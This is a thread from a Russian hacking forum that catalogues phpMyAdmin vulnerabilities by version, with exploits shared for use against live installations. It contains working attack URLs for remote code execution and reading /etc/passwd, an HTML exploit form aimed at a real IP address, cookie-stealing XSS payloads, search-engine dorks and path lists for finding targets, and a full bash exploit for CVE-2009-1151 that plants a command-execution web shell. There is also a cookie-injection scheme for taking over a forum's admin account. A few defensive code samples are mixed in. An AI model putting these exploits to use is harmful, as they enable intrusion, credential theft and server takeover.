ANTICHAT Forum
[ phpMyAdmin vulnerability overview ] (https://forum.antichat.xyz/showthread.php?t=50669)

ettee 07.10.2007 02:31

[ phpMyAdmin vulnerability overview ]
 
Vulnerability


2.2.0rc3
http://victim/phpmyadmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK=".passthru('cat%20/etc/passwd')."
The exploit gives arbitrary code execution.

2.3.2
http://target.com/phpMyAdmin/tbl_properties_structure.php?lang=<SQL INJECTION>
SQL-injection

2.5.*
phpMyAdmin 2.5.7 Remote code injection Exploit
The exploit gives arbitrary code execution.

2.5.5-pl1 and prior
http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00
The exploit gives file read / arbitrary code execution.

2.6.4-pl1
phpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit
The exploit gives read access to any file.

HTML exploit:
HTML code:

<CENTER>
<A HREF="http://www.securityreason.com"><IMG SRC="http://securityreason.com/gfx/small_logo.png"></A><P>
<FORM action="http://74.69.111.236:4681/phpmyadmin/libraries/grab_globals.lib.php" method=post enctype="multipart/form-data">
<input TYPE="hidden" name="usesubform[1]" value="1">
<input TYPE="hidden" name="usesubform[2]" value="1">
<input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p>
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">
<input TYPE="submit" value="Exploit">
</FORM>
</CENTER>


2.7.0
http://victim/phpmyadmin/server_privileges.php?server=1&checkprivs='
http://victim/phpmyadmin/server_privileges.php?server=1&hostname='&username=1&dbname=1&tablename=1
SQL-injection


2.11.2
SQL-injection + XSS
Code:

12 November 2007
Program: phpMyAdmin 2.11.2, possibly earlier versions

Risk: Low

Exploit available: No

Description:
The discovered vulnerabilities allow a remote user to carry out an XSS attack and execute arbitrary SQL commands in the application's database.

1. The vulnerability exists due to insufficient sanitisation of input data in the "db" parameter of the db_create.php script. A remote user can, via a specially crafted request, execute arbitrary script code in the victim's browser in the security context of the vulnerable site. For successful exploitation the attacker must have the CREATE DATABASE privilege and the victim's browser must execute JavaScript code in an img tag (for example, Opera).

2. The vulnerability exists due to insufficient sanitisation of input data in the "db" parameter of the db_create.php script. A remote user can, via a specially crafted request, execute arbitrary SQL commands in the application's database. For successful exploitation the attacker must have the CREATE DATABASE privilege.


other:
http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00
http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
http://www.example.com/phpMyAdmin/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No



XSS (Cross-site Scripting) :

2.6.0-pl2 and prior
http://[target]/[phpMyAdmin_directory]/main.php?"><script>alert(document.cookie)</script></
http://[target]/[phpMyAdmin_directory]/read_dump.php?sql_query=set%20@1=1&zero_rows=<script>alert(document.cookie)</script>

prior to 2.6.2-rc1
http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><script>alert(document.cookie)</script>
http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><h1>XSS</h1>

2.8.0.1
http://example.com/?convcharset=%22%20STYLE=%22background-image:%20url(javascript:alert('XSS'))%22%20r=%22
index.php?set_theme=%3Cscript%3Ealert('Powered By Expaethitec');%3C/script%3E

2.9.x
http://site.com/phpmyadmin/sql.php?db=information_schema&token=your_token&goto=db_details_structure.php&table=CHARACTER_SETS&pos=[xss]


other:
Code:

http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
http://www.example.com/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS]
/phpmyadmin/db_create.php?token=your_token&reload=1&db=[double xss(2 followed xss)]
/phpmyadmin/db_operations.php?db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss]
/phpmyadmin/querywindow.php?token=your_token&db=&table=&query_history_latest=[xss]&query_history_latest_db=[xss]&querydisplay_tab=[xss]


Full path disclosure :
/scripts/check_lang.php
/themes/darkblue_orange/layout.inc.php
/index.php?lang[]=
/index.php?target[]=
/index.php?db[]=
/index.php?goto[]=
/left.php?server[]=
/index.php?table[]=
/server_databases.php?token=your_token&sort_by="
/index.php?db=information_schema&token=your_token&tbl_group[]=
/db_printview.php?db="
/sql.php?back[]=
libraries/string.lib.php
libraries/storage_engines.lib.php
libraries/sqlparser.lib.php
libraries/sql_query_form.lib.php
libraries/select_theme.lib.php
libraries/select_lang.lib.php
libraries/relation_cleanup.lib.php
libraries/left_header.inc.php
libraries/import.lib.php
libraries/header_meta_style.inc.php
libraries/grab_globals.lib.php
libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo)
libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo)
libraries/display_import.lib.php
libraries/display_export.lib.php
libraries/display_create_table.lib.php
libraries/display_create_database.lib.php
libraries/db_table_exists.lib.php
libraries/database_interface.lib.php
libraries/common.lib.php
libraries/check_user_privileges.lib.php
libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true)
libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE)
libraries/import/sql.php
libraries/fpdf/ufpdf.php
libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true)


dork:
Code:

inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
intitle:"index of/phpmyadmin"
phpMyAdmin "running on" inurl:"main.php"
phpMyAdmin dumps
"phpMyAdmin" "running on" inurl:"main.php"
filetype:txt | filetype:sql ("phpMyAdmin SQL Dump"|"phpMyAdmin MySQL-Dump")
intitle:"index of /phpmyadmin" -tar
allinurl:/tbl_properties_structure.php?
inurl:main.php "Welcome to phpMyadmin" -"No Privileges" +"runtime" -"as root@"
http://www.google.com/search?hl=en&lr=&c2coff=1&q=intext:"welcome to phpmyadmin" -login -"no privileges" "Create new database [Documentation]" inurl:phpmyadmin -demo


Files locations
Code:

/phpm/
/phpmy/
/phpmyadmin/
/PMA/
/mysql/
/admin/
/db/
/dbadmin/
/web/phpMyAdmin/
/admin/pma/
/admin/phpmyadmin/
/admin/mysql/
/phpmyadmin2/
/mysqladmin/
/mysql-admin/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.2.3/
/phpMyAdmin-2.2.6/
/myadmin/
/phpMyA/
/phpmyad/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmi/
/phpMyAdmin1/
/phpMyAdmin2/
/phpMyAdmin-2/
/phpMyAdmin-2.10.0/
/phpMyAdmin-2.3.0/
/phpMyAdmin-2.3.1/
/phpMyAdmin-2.3.2/
/phpMyAdmin-2.3.3/
/phpMyAdmin-2.3.4/
/phpMyAdmin-2.3.5/
/phpMyAdmin-2.3.6/
/phpMyAdmin-2.3.7/
/phpMyAdmin-2.3.8/
/phpMyAdmin-2.3.9/
/phpMyAdmin-2.4.0/
/phpMyAdmin-2.4.1/
/phpMyAdmin-2.4.2/
/phpMyAdmin-2.4.3/
/phpMyAdmin-2.4.4/
/phpMyAdmin-2.4.5/
/phpMyAdmin-2.4.6/
/phpMyAdmin-2.4.7/
/phpMyAdmin-2.4.8/
/phpMyAdmin-2.4.9/
/phpMyAdmin-2.5.0/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.5.2/
/phpMyAdmin-2.5.3/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.7/
/phpMyAdmin-2.5.8/
/phpMyAdmin-2.5.9/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.2/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.4/
/phpMyAdmin-2.6.5/
/phpMyAdmin-2.6.6/
/phpMyAdmin-2.6.7/
/phpMyAdmin-2.6.8/
/phpMyAdmin-2.6.9/
/phpMyAdmin-2.7.0/
/phpMyAdmin-2.7.1/
/phpMyAdmin-2.7.2/
/phpMyAdmin-2.7.3/
/phpMyAdmin-2.7.4/
/phpMyAdmin-2.7.5/
/phpMyAdmin-2.7.6/
/phpMyAdmin-2.7.7/
/phpMyAdmin-2.7.8/
/phpMyAdmin-2.7.9/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.2/
/phpMyAdmin-2.8.3/
/phpMyAdmin-2.8.4/
/phpMyAdmin-2.8.5/
/phpMyAdmin-2.8.6/
/phpMyAdmin-2.8.7/
/phpMyAdmin-2.8.8/
/phpMyAdmin-2.8.9/
/phpMyAdmin-2.9.1/
/phpMyAdmin-2.9.2/
/phpMyAdmin-3/
/phpMyAdmin-4/
/phpMyAds/
/phpmyad-sys/


phpMyAdmin security announcement

+toxa+ 07.03.2008 03:49

SQL injection (Delayed Cross Site Request Forgery) <=v2.11.5
 
Quote:

Announcement-ID: PMASA-2008-1
Date: 2008-03-01
Updated: 2008-03-03

Summary:
SQL injection vulnerability (Delayed Cross Site Request Forgery)

Description:
We received an advisory from Richard Cunningham, and we wish to thank him for his work. phpMyAdmin used the $_REQUEST superglobal as a source for its parameters, instead of $_GET and $_POST. This means that on most servers, a cookie with the same name as one of phpMyAdmin's parameters can interfere.
Another application could set a cookie for the root path "/" with a "sql_query" name, therefore overriding the user-submitted sql_query because by default, the $_REQUEST superglobal imports first GET, then POST then COOKIE data.

Severity:
We consider this vulnerability to be serious.

Mitigation factor:
An attacker must trick the victim into visiting a page on the same web server where he has placed code that creates a malicious cookie.

Affected versions:
Versions before 2.11.5.

Solution:
Upgrade to phpMyAdmin 2.11.5 or newer, where $_REQUEST is rebuilt to not contain cookies.

Note on the official site.
Usage example:
We have a site running phpMyAdmin (it doesn't even matter much where, the main thing is that it is installed and the admin logs into it), a forum (IPB, for example) and a script vulnerable to a stored XSS (for example, let's take a hypothetical stored XSS in IPB private messages). We send the admin a piece of code with the XSS (it is important to know the table prefix used on the forum).
Code:
PHP code:

<script>
document.cookie="sql_query=update ibf_members set mgroup=4 where id=31337; path=/; expires=Mon, 01-Jan-2009 00:00:00 GMT";
</script>

ibf_ - the forum's table prefix
4 - the admin group
31337 - our id on the forum

After "infecting" the admin with the XSS, all that remains is to wait until he logs into phpMyAdmin. There the SQL query the admin executes gets overwritten and makes us a forum admin (with this value of the sql_query parameter). To stay unnoticed you can "play" with the expires parameter.

PS at the moment practically all phpMyAdmins are vulnerable (they haven't had time to update, lol))
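The mechanism behind PMASA-2008-1, as an added PHP illustration that is not part of this post or of phpMyAdmin's code: the superglobals are assigned constructed values so the script runs from the CLI, and the rebuild mirrors what the advisory says 2.11.5 does.

```php
<?php
// Added illustration of PMASA-2008-1 (not phpMyAdmin's own code). With the order the
// advisory describes, $_REQUEST is filled from GET, then POST, then COOKIE, and a later
// source overwrites an earlier one, so a cookie named like a form field silently wins.
// Superglobals are assigned here with constructed values so the script runs from the CLI.
$_GET    = array();
$_POST   = array('sql_query' => 'SELECT 1');                // what the user actually submitted
$_COOKIE = array('sql_query' => 'SELECT 2 /* planted */');  // set earlier by another page on the same host

// How $_REQUEST ends up under the default order: later sources override earlier ones.
function build_request_default(array $get, array $post, array $cookie)
{
    return array_merge($get, $post, $cookie);
}

// The fix the advisory describes for 2.11.5: rebuild $_REQUEST from GET and POST only.
function build_request_without_cookies(array $get, array $post)
{
    return array_merge($get, $post);
}

// Defensive check an application can run on every request: a parameter whose name also
// exists as a cookie is a candidate for this kind of override and is worth logging.
function find_cookie_collisions(array $request, array $cookie)
{
    return array_values(array_intersect(array_keys($request), array_keys($cookie)));
}

$vuln = build_request_default($_GET, $_POST, $_COOKIE);
$safe = build_request_without_cookies($_GET, $_POST);

printf("default \$_REQUEST['sql_query'] = %s\n", $vuln['sql_query']);   // the cookie's value wins
printf("rebuilt \$_REQUEST['sql_query'] = %s\n", $safe['sql_query']);   // the user's value is kept
printf("parameters shadowed by cookies: %s\n", implode(', ', find_cookie_collisions($vuln, $_COOKIE)));
```

On PHP 5.3 and later the same effect is available server-wide by setting request_order = "GP" in php.ini, so $_REQUEST never includes cookie data.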

Scipio 16.03.2008 11:42

a couple more XSS; they work in version 2.6.1, the latest versions are not vulnerable:
Code:

http://site/phpMyAdmin/index.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>
Code:

http://site/phpMyAdmin/calendar.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>
etc.
register_globals and magic_quotes don't matter

Code:

http://localhost/Tools/phpMyAdmin/mult_submits.inc.php?submit_mult=1&what=1&strDoYouReally=<script>alert(5555)</script>
register_globals on

in theory this script is vulnerable in the latest versions too, but it has been moved to libraries and changed slightly; in 2.11.5 it is exploited like this:
Code:

http://localhost/Tools/phpMyAdmin/libraries/mult_submits.inc.php?submit_mult=1&what="><script>alert(5555)</script>
but I think in the latest versions access to the script is denied by default via .htaccess

+toxa+ 16.03.2008 17:05

It is a variable that was not cleaned in a way, allowing you to inject SQL code into the cookie. Here is an example of a small vulnerable PHP script.
PHP code:

<?php
$user['id'] = $_COOKIE['uid'];
$query = "SELECT name, password FROM members where uid='" . $user['id'] . "'";
$query = mysql_query($query);
$name = mysql_result($query, 0);
echo 'Hello ' . $name . '!';
?>

If it is a normal user, it would display a perfectly good name like "Hello Admin!".
You can now use a thing such as the extension for Firefox called Cookie Editor, and modify the cookie; you can also do this with JavaScript.
You then edit the cookie's value, it would have been something like "12", but after editing and adding SQL code to it, it would be something like "-1 UNION ALL SELECT USER(), NULL FROM mysql.user--".
That will change the query, and display the user connected to the database, instead of the name of the user stored in the database.
That will result in the following being echoed: "Hello root@localhost".

(c) h4cky0u
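A hardened counterpart to the script above, added here and not part of the original post: the cookie is treated as untrusted input like any GET or POST value, validated, and bound as a parameter instead of being concatenated into the query. Connection details are placeholders, and mysqli is used because the mysql_* functions offer no prepared statements.

```php
<?php
// Added hardened version of the cookie-based lookup (not from the original post).
// The cookie value never reaches the SQL text, so "-1 UNION ALL SELECT ..." cannot
// change the shape of the query; it simply fails validation.

function lookup_name(mysqli $db, string $raw_uid): ?string
{
    // Strict validation: a user id is a non-empty string of digits and nothing else.
    if (!ctype_digit($raw_uid)) {
        return null;
    }
    $uid = (int) $raw_uid;

    // Parameterised query: the value travels separately from the SQL statement.
    // Only the column that is needed is selected; the password hash stays in the database.
    $stmt = $db->prepare('SELECT name FROM members WHERE uid = ?');
    $stmt->bind_param('i', $uid);
    $stmt->execute();
    $stmt->bind_result($name);
    $found = $stmt->fetch();
    $stmt->close();

    return $found ? $name : null;
}

// Placeholder connection details; replace with the application's own.
$db = new mysqli('localhost', 'app_user', 'app_password', 'app_db');

$name = lookup_name($db, $_COOKIE['uid'] ?? '');

// Output-encode as well, so a stored name cannot inject HTML into the page.
echo 'Hello ' . htmlspecialchars($name ?? 'guest', ENT_QUOTES, 'UTF-8') . '!';
```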

~!DoK_tOR!~ 20.09.2008 03:37

Vulnerable:

Code:

Typo3 phpMyAdmin 3.2
Typo3 phpMyAdmin 3.0.1
Typo3 phpMyAdmin 3.0
Typo3 phpMyAdmin 0.2.2
Turbolinux Appliance Server 3.0 x64
Turbolinux Appliance Server 3.0
phpMyAdmin phpMyAdmin 2.11.9
phpMyAdmin phpMyAdmin 2.11.8
phpMyAdmin phpMyAdmin 2.11.7
phpMyAdmin phpMyAdmin 2.11.5 1
phpMyAdmin phpMyAdmin 2.11.5
phpMyAdmin phpMyAdmin 2.11.4
phpMyAdmin phpMyAdmin 2.11.1
phpMyAdmin phpMyAdmin 2.9.1
phpMyAdmin phpMyAdmin 2.9.2-rc1
phpMyAdmin phpMyAdmin 2.9.1.1
phpMyAdmin phpMyAdmin 2.11.8.1
phpMyAdmin phpMyAdmin 2.11.5.2
phpMyAdmin phpMyAdmin 2.11.2.2
phpMyAdmin phpMyAdmin 2.11.2.1
phpMyAdmin phpMyAdmin 2.11.1.2
phpMyAdmin phpMyAdmin 2.11.1.1
phpMyAdmin phpMyAdmin 2.10.0.2
phpMyAdmin phpMyAdmin 2.10.0.1
phpMyAdmin phpMyAdmin 2.10.0.1

Exploit:

Code:

http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
Execution of arbitrary PHP code on the server, including calling external commands via the PHP function exec().

Solution:

Upgrade to phpMyAdmin 2.11.9.1 or newer.

Not Vulnerable:

Code:

Typo3 phpMyAdmin 3.3
phpMyAdmin phpMyAdmin 2.11.9 .1

www.phpmyadmin.net

ZAMUT 02.10.2008 00:15

the bug is analysed here

+StArT+ 05.10.2008 19:02

Quote:

Originally Posted by ZAMUT
the bug is analysed here

Also worth adding: the bug works starting from version [ phpMyAdmin 2.9.0-beta1 => ]

swt1 09.12.2008 02:03

phpMyAdmin 3.1.0 (XSRF) SQL Injection Vulnerability
______________________
http://www.milw0rm.com/exploits/7382

baltazar 24.12.2008 21:31

2.10.0.2
 
XSS
Code:

http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]
http://[server]/server_privileges.php?token=[SID]&username=[XSS]
http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]
http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[XSS]
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[XSS]&unlim_num_rows=4&single_table=true
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0[XSS]&session_max_rows=30&disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4&single_table=true

Original: http://downloads.securityfocus.com/vulnerabilities/exploits/25268.html

tmp 08.02.2009 22:28

Quote:

Originally Posted by +StArT+
Also worth adding: the bug works starting from version [ phpMyAdmin 2.9.0-beta1 => ]

:) I'd also add:
Works on MySQL 4
On 5 it doesn't work.
At least for me.
Just tested it.) (good thing that where it matters, it's version 4))))

ph1l1ster 16.03.2009 02:12

Code:

calendar.php?GLOBALS
you can find out the exact version if it's > 3.*

omel 11.06.2009 01:18

phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
 
Code:

#!/bin/bash

# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)

# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

if [[ $# -ne 1 ]]
then
        echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
        echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
        exit
fi

if ! which curl >/dev/null
then
        echo "sorry but you need curl for this script to work!"
              echo "on Debian/Ubuntu: sudo apt-get install curl"
              exit
fi


function exploit {

postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

        flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
       
        echo "[+] attempting to inject phpinfo() ..."
        curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null

        if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
        then
                curl -ks --url "$3/config/config.inc.php" >$flag       
                echo "[+] success! phpinfo() injected successfully! output saved on $flag"
                curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
                echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
                echo "    $3/config/config.inc.php?c=ls+-l+/"
                echo "    $3/config/config.inc.php?p=phpinfo();"
                echo "    please send any feedback/improvements for this script to"\
                "unknown.pentester<AT_sign__here>gmail.com"
        else
                echo "[+] no luck injecting to $3/config/config.inc.php :("
                exit
        fi
}
# end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided ..."

#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
        length=`echo -n $token | wc -c`

        # valid form token obtained?
        if [[ $length -eq 32 ]]
        then
                echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
                # attempt exploit!
                exploit $token $cookiejar $1
        else
                echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
                exit
        fi
else
        echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
        exit
fi

# milw0rm.com [2009-06-09]


ettee 14.06.2009 04:11

CVE-2009-1151 (phpmyadminrcesh.txt) PMASA-2009-3 PMASA-2009-4

Code:

<?php
/*
 * Generated configuration file
 * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <michal@cihar.com>
 * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
 * Date: Tue, 09 Jun 2009 14:13:34 GMT
 */

/* Servers configuration */
$i = 0;

/* Server  (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo
'<pre>';eval($_GET['p']);echo '</pre>';};//'
] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';

/* End of servers configuration */

?>

phpMyAdmin//config/config.inc.php?c=ls+-l+/
phpMyAdmin//config/config.inc.php?p=phpinfo();

Vulnerable software and versions:
phpmyadmin:3.1.3
phpmyadmin:3.1.3:rc1
phpmyadmin:3.1.2
phpmyadmin:3.1.2:rc1
phpmyadmin:3.1.1
phpmyadmin:3.1.1:rc1
phpmyadmin:3.1.0
phpmyadmin:2.11.9.3
phpmyadmin:2.11.9.4
phpmyadmin:2.11.9.2
phpmyadmin:2.11.9.1
phpmyadmin:2.11.9.0
phpmyadmin:2.11.9
phpmyadmin:2.11.8
phpmyadmin:2.11.7.1
phpmyadmin:2.11.7.0
phpmyadmin:2.11.7
phpmyadmin:2.11.6:rc1
phpmyadmin:2.11.6.0
phpmyadmin:2.11.6
phpmyadmin:2.11.5:rc1
phpmyadmin:2.11.5.2
phpmyadmin:2.11.5.1
phpmyadmin:2.11.5.0
phpmyadmin:2.11.5
phpmyadmin:2.11.4:rc1
phpmyadmin:2.11.4
phpmyadmin:2.11.3:rc1
phpmyadmin:2.11.3.0
phpmyadmin:2.11.3
phpmyadmin:2.11.2.2
phpmyadmin:2.11.2.1
phpmyadmin:2.11.2.0
phpmyadmin:2.11.2
phpmyadmin:2.11.1:rc1
phpmyadmin:2.11.1.2
phpmyadmin:2.11.1.1
phpmyadmin:2.11.1.0
phpmyadmin:2.11.1
phpmyadmin:2.11.0:rc1
phpmyadmin:2.11.0:beta1
phpmyadmin:2.11.0
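As an added illustration of the bug class behind CVE-2009-1151 (constructed for this thread, not phpMyAdmin's own setup.php): a config writer that pastes submitted array keys into PHP source lets a key containing a quote break out of the string literal, exactly as in the config.inc.php above; the safe writer whitelists keys (an assumed list) and emits every key and value through var_export().

```php
<?php
// Added illustration (not phpMyAdmin's own code) of why the config above ended up
// executable: the generator interpolated a submitted key into a single-quoted PHP
// string, so a key containing "']" closed the literal and the rest became code.

// Constructed submission: the "host" key has been tampered with, in the same shape as the PoC.
$submitted = array(
    array(
        "host']=''; echo 'injected'; //" => 'localhost',
        'extension'                       => 'mysqli',
        'auth_type'                       => 'config',
    ),
);

// Keys the generated file is allowed to contain (an assumed whitelist for this example).
$allowed_keys = array('host', 'extension', 'connect_type', 'compress', 'auth_type', 'user');

// BUG: key and value are pasted verbatim between single quotes.
function write_config_unsafe(array $servers)
{
    $out = "<?php\n\$i = 0;\n";
    foreach ($servers as $server) {
        $out .= "\$i++;\n";
        foreach ($server as $key => $value) {
            $out .= "\$cfg['Servers'][\$i]['" . $key . "'] = '" . $value . "';\n";
        }
    }
    return $out;
}

// Safe: unknown keys are rejected outright, and every key and value is emitted as a
// properly escaped PHP literal via var_export(), so no input can terminate a string.
function write_config_safe(array $servers, array $allowed_keys)
{
    $out = "<?php\n\$i = 0;\n";
    foreach ($servers as $server) {
        $out .= "\$i++;\n";
        foreach ($server as $key => $value) {
            if (!in_array((string) $key, $allowed_keys, true)) {
                throw new InvalidArgumentException('rejected config key: ' . var_export($key, true));
            }
            $out .= '$cfg[\'Servers\'][$i][' . var_export((string) $key, true) . '] = '
                  . var_export($value, true) . ";\n";
        }
    }
    return $out;
}

echo "--- unsafe generator writes executable code ---\n", write_config_unsafe($submitted), "\n";

try {
    echo write_config_safe($submitted, $allowed_keys);
} catch (InvalidArgumentException $e) {
    echo "--- safe generator refuses the tampered input ---\n", $e->getMessage(), "\n\n";
}

// With legitimate input the safe writer produces ordinary assignments; note that the
// single quote in the user name is escaped by var_export() instead of ending the literal.
$clean = array(array('host' => 'localhost', 'extension' => 'mysqli', 'user' => "o'brien"));
echo "--- safe generator on clean input ---\n", write_config_safe($clean, $allowed_keys);
```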

Spyder 02.07.2009 21:16

Regarding full path disclosure
In recent versions there is a phpinfo.php file in the PMA root with the corresponding content, and as a rule admins don't delete it

ettee 08.07.2009 19:49

Files locations
Code:

/php-my-admin/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.5-pl1/
/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.7-pl1/
